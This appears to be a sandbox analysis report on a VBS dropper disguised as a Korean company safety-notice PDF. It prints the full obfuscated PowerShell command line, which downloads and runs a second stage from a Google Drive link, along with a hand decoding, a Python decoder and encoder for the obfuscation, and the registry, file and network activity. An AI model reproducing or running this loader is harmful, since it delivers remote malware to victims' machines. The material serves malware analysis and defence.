CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. 
Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai 
Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti 
erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio 
coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3992
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\(전사공지용) 24년 안전작업허가 기준 안내 (240415)·pdf.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
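The two PowerShell command lines in the table use one trick throughout: every string literal is seven characters of filler followed by one payload character, and Rekordjagt walks the string from index 7 in steps of 8 (the loop bound of Length-1 discards a final pad character every string carries). Dentagra176 is `. iex`, so each decoded string is executed as PowerShell. Decoding the literals by hand from the text above: $Systematist is `iex`; $Rubys is `User-Agent`; $Skrive is the user agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0`; $Cargoliner is `https://drive.google.com/uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_`; and $Ankyloproctia106 is `echo %appdata%\Irreplaceableness.Suc && echo $`, which is the cmd.exe line the table records (the GUID sits where the trailing `$` was). The download target, %appdata%\Irreplaceableness.Suc, appears in the dropped-files list, and the second stage's decoded text contains `[System.Convert]::FromBase64String(` and `[System.Text.Encoding]::ASCII.GetString(`, which matches the base64/byte-array indicators above. One caveat before copying the long literals out of this page: this rendering appears to have collapsed runs of spaces inside them (after `Revalua` and `E.itaxi`, for instance), so a mechanical decode of $Skrive or $Cargoliner from this text drifts after `Mozilla/5.0 `; the short literals survive intact. The following Python is an added example written for this page, not the sample's or ANY.RUN's code: a port of Rekordjagt, an encoder that reproduces the framing so the decoder can be exercised on constructed input, a length check that catches copies whose framing was damaged, and a decode of the three short literals quoted verbatim from the table.

```python
from itertools import cycle


def rekordjagt(s: str, start: int = 7, step: int = 8) -> str:
    """Port of the script's Rekordjagt: emit s[start], s[start+step], ... for indices below len(s)-1.
    The len-1 bound is what drops the single pad character that ends every encoded literal."""
    return "".join(s[i] for i in range(start, len(s) - 1, step))


def obfuscate(payload: str, fillers: list) -> str:
    """Inverse of rekordjagt (constructed for this example): seven filler characters precede each
    payload character, and a final filler-plus-space pad keeps the total length a multiple of 8."""
    words = cycle(fillers)
    out = [next(words)[:7].ljust(7) + ch for ch in payload]
    out.append(next(words)[:7].ljust(7) + " ")
    return "".join(out)


def well_formed(s: str) -> bool:
    """A faithfully copied literal is exactly 8 * (payload length + 1) characters long."""
    return len(s) >= 8 and len(s) % 8 == 0


# Short literals copied verbatim from the PID 2856 / 2072 command lines in the process table.
PAGE_STRINGS = {
    "$Systematist": "TimbresislavebaeBegonerxSjofeli ",
    "$Constabless": " Acture> Immate ",
    "$Rubys": " StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ",
}


def decode_all(strings: dict) -> dict:
    """Decode each literal and record whether its length still fits the 8-character framing."""
    return {name: {"decoded": rekordjagt(s), "well_formed": well_formed(s)} for name, s in strings.items()}


if __name__ == "__main__":
    for name, result in decode_all(PAGE_STRINGS).items():
        print(f"{name:13} -> {result['decoded']!r}  (well formed: {result['well_formed']})")
    # Constructed round trip; the filler words are arbitrary and carry no meaning.
    sample = obfuscate("Invoke-WebRequest", ["Kaffe", "Bordtennis", "Lygtepl", "Sko"])
    print(rekordjagt(sample))
```

When decoding a fresh copy of the command line, run `well_formed` first: a literal whose length is not a multiple of 8 has lost characters in transit and the payload will be garbage from the first missing character onward.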
Total events: 19,223
Read events: 19,092
Write events: 101
Delete events: 30

Modification events

(PID) Process: (3992) wscript.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3992) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
Operation: delete value
Name: 9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Value: (none)

(PID) Process: (3992) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: write
Name: Blob
Value: (elided by the page as a duplicate Blob)

(PID) Process: (3992) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: delete value
Name: File
Value: (none)

(PID) Process: (3992) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: delete key
Name: (default)
Value: (none)

(PID) Process: (3992) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: write
Name: Blob
Value:
1400000001000000140000005D6CA352CEFC713CBBC5E21F663C3639FD19D4D70300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process: (3992) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1
(PID) Process: (3992) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1
(PID) Process: (3992) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1
Executable files: 0
Suspicious files: 16
Text files: 2
Unknown types: 3

Dropped files

PID | Process | Filename | Type
3992 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed
3992 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary
3992 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Cab213F.tmp | compressed
3992 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Tar2140.tmp | cat
3992 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Miljforstyrrelsen.txt | text
2856 | powershell.exe | C:\Users\admin\AppData\Local\Temp\wfgozhwb.hef.ps1 | binary
2856 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jjou1dpt.a3w.psm1 | binary
2856 | powershell.exe | C:\Users\admin\AppData\Roaming\Irreplaceableness.Suc | text
2072 | powershell.exe | C:\Users\admin\AppData\Local\Temp\niawd11v.1dm.ps1 | binary
2072 | powershell.exe | C:\Users\admin\AppData\Local\Temp\0t2heobb.urd.psm1 | binary
(MD5 and SHA256 values for the dropped files are not present in this report.)
HTTP(S) requests: 7
TCP/UDP connections: 12
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1900 | wab.exe | GET | 200 | 142.250.186.35:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | US | binary | 724 b | unknown
1900 | wab.exe | GET | 304 | 23.32.238.201:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6578879dcf199db3 | DE | - | - | unknown
3992 | wscript.exe | GET | 200 | 23.32.238.219:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?10f9d6e8c9bbb863 | DE | compressed | 68.3 Kb | unknown
1900 | wab.exe | GET | 200 | 142.250.186.35:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | US | binary | 1.41 Kb | unknown
1080 | svchost.exe | GET | 304 | 23.32.238.219:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3e412f7b4eff0943 | DE | - | - | unknown
1900 | wab.exe | GET | 200 | 142.250.186.35:80 | http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCs1z%2BNuYt%2ByxDDkVqEYek%2F | US | binary | 472 b | unknown
1900 | wab.exe | GET | 200 | 142.250.186.35:80 | http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCb04uMpoGrFRCW8s8fxxYV | US | binary | 472 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 224.0.0.252:5355 | - | - | - | unknown
3992 | wscript.exe | 23.32.238.219:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown
1080 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
2856 | powershell.exe | 216.58.206.78:443 | drive.google.com | GOOGLE | US | whitelisted
2856 | powershell.exe | 142.250.181.225:443 | drive.usercontent.google.com | GOOGLE | US | whitelisted
1900 | wab.exe | 216.58.206.78:443 | drive.google.com | GOOGLE | US | whitelisted
1900 | wab.exe | 23.32.238.201:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown
1900 | wab.exe | 142.250.186.35:80 | ocsp.pki.goog | GOOGLE | US | whitelisted

DNS requests

Domain | IP | Reputation
ctldl.windowsupdate.com | 23.32.238.219, 23.32.238.226, 23.32.238.201, 23.32.238.208 | whitelisted
drive.google.com | 216.58.206.78 | shared
drive.usercontent.google.com | 142.250.181.225 | unknown
ocsp.pki.goog | 142.250.186.35 | whitelisted

Threats

No threats detected
No debug info